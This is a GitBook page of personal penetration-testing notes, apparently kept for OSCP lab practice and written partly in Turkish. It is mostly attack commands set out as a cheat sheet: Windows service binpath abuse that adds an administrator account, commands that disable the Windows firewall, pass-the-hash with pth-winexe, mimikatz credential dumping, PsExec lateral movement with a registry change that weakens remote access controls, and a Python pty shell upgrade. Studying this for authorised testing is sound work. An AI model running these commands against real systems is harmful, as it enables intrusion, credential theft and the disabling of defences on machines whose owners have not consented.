messy security notes
  • security is an illision
  • Useful Blog Links
  • Windows
    • ad-101
    • MS17-010
    • SMB
    • Post Exploitation Tricks
    • DCOM/RPC
    • Basic Commands
    • SMB Enumeration
  • Linux
    • SUID Set Edilmiş servicectl Abuse Etme
    • sudoers dosyası bozulursa?
    • SSH Welcome Message and Banner
    • pkexec ve pkttyagent
    • vipw , vigr , visudo
    • IP Forwarding
    • İki NIC Arasında Port Yönlendirme
    • tasksel
    • LAMP
    • Find All SUID Bit
    • Linux Operatorler
    • IFS
    • Ssh Public Key Tricks
    • Local & Remote Port Forwarding
    • Linux Priv Esc
    • Static IP
  • POST EXPLOITATION
    • from external network to domain admin
    • post exp 2
  • OSCP
  • Temel Komutlar ve Araçlar
  • Zayıf Servisler
  • Örnek Bir Senaryo
  • Parola Saldırıları
  • ms17-010 python exploit
  • Full Interactive Shell
  • Notes*
  • Apache James Server 2.3.2 Exploit
  • windows exploit suggester
  • FreeBsd and Some PHP tricks
  • fundamental blog
  • Metasoloit & Meterpreter & msfvenom
  • at-tftp server 1.9
  • Tunneling and Forwarding
  • Common Exploits
  • Windows Servisler
  • Execute process as another user
  • Teorik
    • Authentication and Authorization
    • Kullanıcı Hesap Türleri ve Hakları
    • Kerberos
  • SYSTEM
    • Apache2
    • Bind9 Log
    • apache - basic auth - proxy
  • Buffer Overflow - BOF
    • BOF - Stack Based
    • BoF Links
  • BASH SCRIPTING
    • Samples
  • keepnote
  • Docker
    • Docker
  • Misc
    • 50-cloud-init.yaml
Powered by GitBook
On this page

Was this helpful?

keepnote

PreviousSamplesNextDocker

Last updated 3 years ago

Was this helpful?

file transfer;

Winpriv check:

Local Privilege Escalation Abusing Misconfiguration Service (upnphost):

accesschk.exe -uwcqv "Authenticated Users" /accepteula accesschk-xp.exe -uwcqv "Authenticated Users" /accepteula

accesschk.exe -ucqv upnphost sc config upnphost depend= "" sc config upnphost binpath= "net user testxlab Password1 /add" sc config upnphost binpath= "net localgroup Administrators testxlab /add"

sc stop upnphost sc start upnphost

File Transfer via FTP

ftp > binary

ftp> put /root/Downloads/accesschk.exe accesschk.exe

Python Interactive Shell

pty spawn python3 -c 'import pty;pty.spawn("/bin/bash")'

python -c 'import pty;pty.spawn("/bin/bash")'

Disable Windows firewall on newer versions: NetSh Advfirewall set allprofiles state off

Disable windows firewall on older windows: netsh firewall set opmode disable

Referans

PtH

pth-winexe -U alice%aad3b435b51404eeaad3b435b51404ee:B74242F37E47371AFF835A6EBCAC4FFE //10.11.1.49 cmd.exe

via sysinternals tools and mimikatz

  • PtH get user ntlm hash. (via RDP, MSF or other)

mimikatz# privilege::debug 
mimikatz# privilege::minidump FILE.DMP 
mimikatz# sekurlsa::logonpasswords 
mimikatz# sekurlsa::pth /user:{USERNAME} /domain:{WORKGROUP or DOMAIN} /ntlm:{NTLM-HASH}

then open new cmd. you can run command via psexec.

windows> PsExec.exe \\{IP} cmd

Tip: General usage with password:

PsExec.exe \\{IP} -u {DOMAIN\USERNAME} -p {PASSWORD} cmd

if got "Couldn't access otherComputer: Access is denied." ERROR:

run the following command at target system:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

cadaver

priv esc linux - hacking articler (abuse path variable.)

priv esc - cronjob

priv esc - windows - servisler - sc

http://10.11.1.14/
https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
https://www.siberportal.org/red-team/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/
https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat
Transferring Files from Linux to Windows (post-exploitation)ropnop blog
Logo